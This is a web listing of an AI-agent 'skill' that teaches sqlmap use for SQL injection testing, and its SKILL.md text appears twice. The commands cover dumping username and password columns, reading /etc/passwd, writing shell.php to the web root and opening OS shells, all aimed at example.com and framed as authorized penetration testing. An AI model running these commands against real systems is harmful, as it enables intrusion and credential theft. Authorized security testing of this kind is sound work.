/webapp-sqlmap
Automated SQL injection detection and exploitation tool for web application security testing. Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments, (2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database
$ npx -y skills add AgentSecOps/SecOpsAgentKit --skill webapp-sqlmap --agent claude-codeHow it fires
How this skill gets triggered: by you, by Claude, or both.
- Fires itselfAuto-invocation. Claude auto-loads it when your prompt matches the work.Auto-invocation is when the right skill fires by itself at the right moment, driven by a FLOW.md router and a hook, instead of you invoking it by name. It is the difference between a skill being installed and a skill actually getting used.Read the full definition →
- You can call itInvoke it directly when you want it.
- Slash command
/webapp-sqlmap
Context preview
The summary Claude sees to decide when to auto-load this skill.
Automated SQL injection detection and exploitation tool for web application security testing. Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments, (2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database
SKILL.md
webapp-sqlmap.SKILL.mdname: webapp-sqlmap
description: >
Automated SQL injection detection and exploitation tool for web application security testing.
Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments,
(2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database information for
security validation, (4) Bypassing authentication mechanisms through SQL injection, (5) Identifying
vulnerable parameters in web requests, (6) Automating database enumeration and data extraction.
version: 0.1.0
maintainer: sirappsec@gmail.com
category: offsec
tags: [sqli, sql-injection, webapp, database-security, exploitation, sqlmap]
frameworks: [OWASP, CWE, MITRE-ATT&CK]
dependencies:
packages: [sqlmap, python3]
references:
- https://sqlmap.org/
- https://owasp.org/www-community/attacks/SQL_Injection
- https://cwe.mitre.org/data/definitions/89.html
SQLMap - Automated SQL Injection Tool
Overview
SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. This skill covers authorized security testing including vulnerability detection, database enumeration, data extraction, and authentication bypass.
**IMPORTANT**: SQL injection exploitation is invasive and can corrupt data. Only use SQLMap with proper written authorization on systems you own or have explicit permission to test.
Quick Start
Basic SQL injection detection:
# Test single parameter
sqlmap -u "http://example.com/page?id=1"
# Test with POST data
sqlmap -u "http://example.com/login" --data="username=admin&password=test"
# Test from saved request file
sqlmap -r request.txt
# Detect and enumerate databases
sqlmap -u "http://example.com/page?id=1" --dbs
Core Workflow
SQL Injection Testing Workflow
Progress: [ ] 1. Verify authorization for web application testing [ ] 2. Identify potential injection points [ ] 3. Detect SQL injection vulnerabilities [ ] 4. Determine DBMS type and version [ ] 5. Enumerate databases and tables [ ] 6. Extract sensitive data (if authorized) [ ] 7. Document findings with remediation guidance [ ] 8. Clean up any test artifacts
Work through each step systematically. Check off completed items.
1. Authorization Verification
**CRITICAL**: Before any SQL injection testing:
- Confirm written authorization from application owner
- Verify scope includes web application security testing
- Understand data protection and handling requirements
- Document allowed testing windows
- Confirm backup and rollback procedures
2. Target Identification
Identify potential SQL injection points:
**GET Parameters**:
# Single URL with parameter
sqlmap -u "http://example.com/product?id=1"
# Multiple parameters
sqlmap -u "http://example.com/search?query=test&category=all&sort=name"
# Test all parameters
sqlmap -u "http://example.com/page?id=1&name=test" --level=5 --risk=3
**POST Requests**:
# POST data directly
sqlmap -u "http://example.com/login" --data="user=admin&pass=test"
# From Burp Suite request file
sqlmap -r login_request.txt
# With additional headers
sqlmap -u "http://example.com/api" --data='{"user":"admin"}' --headers="Content-Type: application/json"**Cookies and Headers**:
# Test cookies
sqlmap -u "http://example.com/" --cookie="sessionid=abc123; role=user"
# Test custom headers
sqlmap -u "http://example.com/" --headers="X-Forwarded-For: 1.1.1.1\nUser-Agent: Test"
# Test specific injection point
sqlmap -u "http://example.com/" --cookie="sessionid=abc123*; role=user"
3. Detection and Fingerprinting
Detect SQL injection vulnerabilities:
# Basic detection
sqlmap -u "http://example.com/page?id=1"
# Aggressive testing (higher risk)
sqlmap -u "http://example.com/page?id=1" --level=5 --risk=3
# Specify technique
sqlmap -u "http://example.com/page?id=1" --technique=BEUSTQ
# Detect DBMS
sqlmap -u "http://example.com/page?id=1" --fingerprint
# Force specific DBMS
sqlmap -u "http://example.com/page?id=1" --dbms=mysql
**Injection Techniques**:
- **B**: Boolean-based blind
- **E**: Error-based
- **U**: UNION query-based
- **S**: Stacked queries
- **T**: Time-based blind
- **Q**: Inline queries
4. Database Enumeration
Enumerate database structure:
# List databases
sqlmap -u "http://example.com/page?id=1" --dbs
# Current database
sqlmap -u "http://example.com/page?id=1" --current-db
# List tables in database
sqlmap -u "http://example.com/page?id=1" -D database_name --tables
# List columns in table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --columns
# Database users
sqlmap -u "http://example.com/page?id=1" --users
# Database user privileges
sqlmap -u "http://example.com/page?id=1" --privileges
5. Data Extraction
Extract data from database (authorized only):
# Dump specific table
sqlmap -u "http://example.com/page?id=1" -D database_name -T users --dump
# Dump specific columns
sqlmap -u "http://example.com/page?id=1" -D database_name -T users -C username,password --dump
# Dump all databases (use with caution)
sqlmap -u "http://example.com/page?id=1" --dump-all
# Exclude system databases
sqlmap -u "http://example.com/page?id=1" --dump-all --exclude-sysdbs
# Search for specific data
sqlmap -u "http://example.com/page?id=1" -D database_name --search -C password
6. Advanced Exploitation
Advanced SQL injection techniques:
**File System Access**:
# Read file from server
sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd"
# Write file to server (very invasive)
sqlmap -u "http://example.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
**OS Command Execution** (requires stacked queries or out-of-band):
# Execute OS command
sqlmap -u "http://example.com/page?id=1" --os-cmd="whoami"
# Get OS shell
sqlmap -u "http://example.com/page?id=1" --os-shell
# Get SQL shell
sqlmap
Read more
name: webapp-sqlmap description: > Automated SQL injection detection and exploitation tool for web application security testing. Use when: (1) Testing web applications for SQL injection vulnerabilities in authorized assessments, (2) Exploiting SQL injection flaws to demonstrate impact, (3) Extracting database information for security validation, (4) Bypassing authentication mechanisms through SQL injection, (5) Identifying vulnerable parameters in web requests, (6) Automating database enumeration and data extraction. version: 0.1.0 maintainer: sirappsec@gmail.com category: offsec tags: [sqli, sql-injection, webapp, database-security, exploitation, sqlmap] frameworks: [OWASP, CWE, MITRE-ATT&CK] dependencies: packages: [sqlmap, python3] references: - https://sqlmap.org/ - https://owasp.org/www-community/attacks/SQL_Injection - https://cwe.mitre.org/data/definitions/89.html
SQLMap - Automated SQL Injection Tool
Overview
SQLMap is an open-source penetration testing tool that automates the detection and exploitation of SQL injection vulnerabilities. This skill covers authorized security testing including vulnerability detection, database enumeration, data extraction, and authentication bypass.
**IMPORTANT**: SQL injection exploitation is invasive and can corrupt data. Only use SQLMap with proper written authorization on systems you own or have explicit permission to test.
Quick Start
Basic SQL injection detection:
# Test single parameter sqlmap -u "http://example.com/page?id=1" # Test with POST data sqlmap -u "http://example.com/login" --data="username=admin&password=test" # Test from saved request file sqlmap -r request.txt # Detect and enumerate databases sqlmap -u "http://example.com/page?id=1" --dbs
Core Workflow
SQL Injection Testing Workflow
Progress: [ ] 1. Verify authorization for web application testing [ ] 2. Identify potential injection points [ ] 3. Detect SQL injection vulnerabilities [ ] 4. Determine DBMS type and version [ ] 5. Enumerate databases and tables [ ] 6. Extract sensitive data (if authorized) [ ] 7. Document findings with remediation guidance [ ] 8. Clean up any test artifacts
Work through each step systematically. Check off completed items.
1. Authorization Verification
**CRITICAL**: Before any SQL injection testing:
- Confirm written authorization from application owner
- Verify scope includes web application security testing
- Understand data protection and handling requirements
- Document allowed testing windows
- Confirm backup and rollback procedures
2. Target Identification
Identify potential SQL injection points:
**GET Parameters**:
# Single URL with parameter sqlmap -u "http://example.com/product?id=1" # Multiple parameters sqlmap -u "http://example.com/search?query=test&category=all&sort=name" # Test all parameters sqlmap -u "http://example.com/page?id=1&name=test" --level=5 --risk=3
**POST Requests**:
# POST data directly
sqlmap -u "http://example.com/login" --data="user=admin&pass=test"
# From Burp Suite request file
sqlmap -r login_request.txt
# With additional headers
sqlmap -u "http://example.com/api" --data='{"user":"admin"}' --headers="Content-Type: application/json"**Cookies and Headers**:
# Test cookies sqlmap -u "http://example.com/" --cookie="sessionid=abc123; role=user" # Test custom headers sqlmap -u "http://example.com/" --headers="X-Forwarded-For: 1.1.1.1\nUser-Agent: Test" # Test specific injection point sqlmap -u "http://example.com/" --cookie="sessionid=abc123*; role=user"
3. Detection and Fingerprinting
Detect SQL injection vulnerabilities:
# Basic detection sqlmap -u "http://example.com/page?id=1" # Aggressive testing (higher risk) sqlmap -u "http://example.com/page?id=1" --level=5 --risk=3 # Specify technique sqlmap -u "http://example.com/page?id=1" --technique=BEUSTQ # Detect DBMS sqlmap -u "http://example.com/page?id=1" --fingerprint # Force specific DBMS sqlmap -u "http://example.com/page?id=1" --dbms=mysql
**Injection Techniques**:
- **B**: Boolean-based blind
- **E**: Error-based
- **U**: UNION query-based
- **S**: Stacked queries
- **T**: Time-based blind
- **Q**: Inline queries
4. Database Enumeration
Enumerate database structure:
# List databases sqlmap -u "http://example.com/page?id=1" --dbs # Current database sqlmap -u "http://example.com/page?id=1" --current-db # List tables in database sqlmap -u "http://example.com/page?id=1" -D database_name --tables # List columns in table sqlmap -u "http://example.com/page?id=1" -D database_name -T users --columns # Database users sqlmap -u "http://example.com/page?id=1" --users # Database user privileges sqlmap -u "http://example.com/page?id=1" --privileges
5. Data Extraction
Extract data from database (authorized only):
# Dump specific table sqlmap -u "http://example.com/page?id=1" -D database_name -T users --dump # Dump specific columns sqlmap -u "http://example.com/page?id=1" -D database_name -T users -C username,password --dump # Dump all databases (use with caution) sqlmap -u "http://example.com/page?id=1" --dump-all # Exclude system databases sqlmap -u "http://example.com/page?id=1" --dump-all --exclude-sysdbs # Search for specific data sqlmap -u "http://example.com/page?id=1" -D database_name --search -C password
6. Advanced Exploitation
Advanced SQL injection techniques:
**File System Access**:
# Read file from server sqlmap -u "http://example.com/page?id=1" --file-read="/etc/passwd" # Write file to server (very invasive) sqlmap -u "http://example.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php"
**OS Command Execution** (requires stacked queries or out-of-band):
# Execute OS command sqlmap -u "http://example.com/page?id=1" --os-cmd="whoami" # Get OS shell sqlmap -u "http://example.com/page?id=1" --os-shell # Get SQL shell sqlmap
An assortment of security operations skills for AI coding agents. A collaborative approach to shift-left security using Claude Code skills.
Other skills on secopsagentkit.
- /api-mitmproxy
Interactive HTTPS proxy for API security testing with traffic interception, modification, and replay capabilities. Supports HTTP/1, HTTP/2, HTTP/3, WebSockets, and TLS-protected protocols. Includes Python scripting API for automation and multiple interfaces (console, web, CLI).
Open skill - /api-spectral
API specification linting and security validation using Stoplight's Spectral with support for OpenAPI, AsyncAPI, and Arazzo specifications. Validates API definitions against security best practices, OWASP API Security Top 10, and custom organizational standards. Use when: (1)
Open skill - /dast-ffuf
Fast web fuzzer for DAST testing with directory enumeration, parameter fuzzing, and virtual host discovery. Written in Go for high-performance HTTP fuzzing with extensive filtering capabilities. Supports multiple fuzzing modes (clusterbomb, pitchfork, sniper) and recursive
Open skill - /dast-nuclei
Fast, template-based vulnerability scanning using ProjectDiscovery's Nuclei with extensive community templates covering CVEs, OWASP Top 10, misconfigurations, and security issues across web applications, APIs, and infrastructure. Use when: (1) Performing rapid vulnerability
Open skill - /dast-zap
Dynamic application security testing (DAST) using OWASP ZAP (Zed Attack Proxy) with passive and active scanning, API testing, and OWASP Top 10 vulnerability detection. Use when: (1) Performing runtime security testing of web applications and APIs, (2) Detecting vulnerabilities
Open skill - /sast-bandit
Python security vulnerability detection using Bandit SAST with CWE and OWASP mapping. Use when: (1) Scanning Python code for security vulnerabilities and anti-patterns, (2) Identifying hardcoded secrets, SQL injection, command injection, and insecure APIs, (3) Generating
Open skill

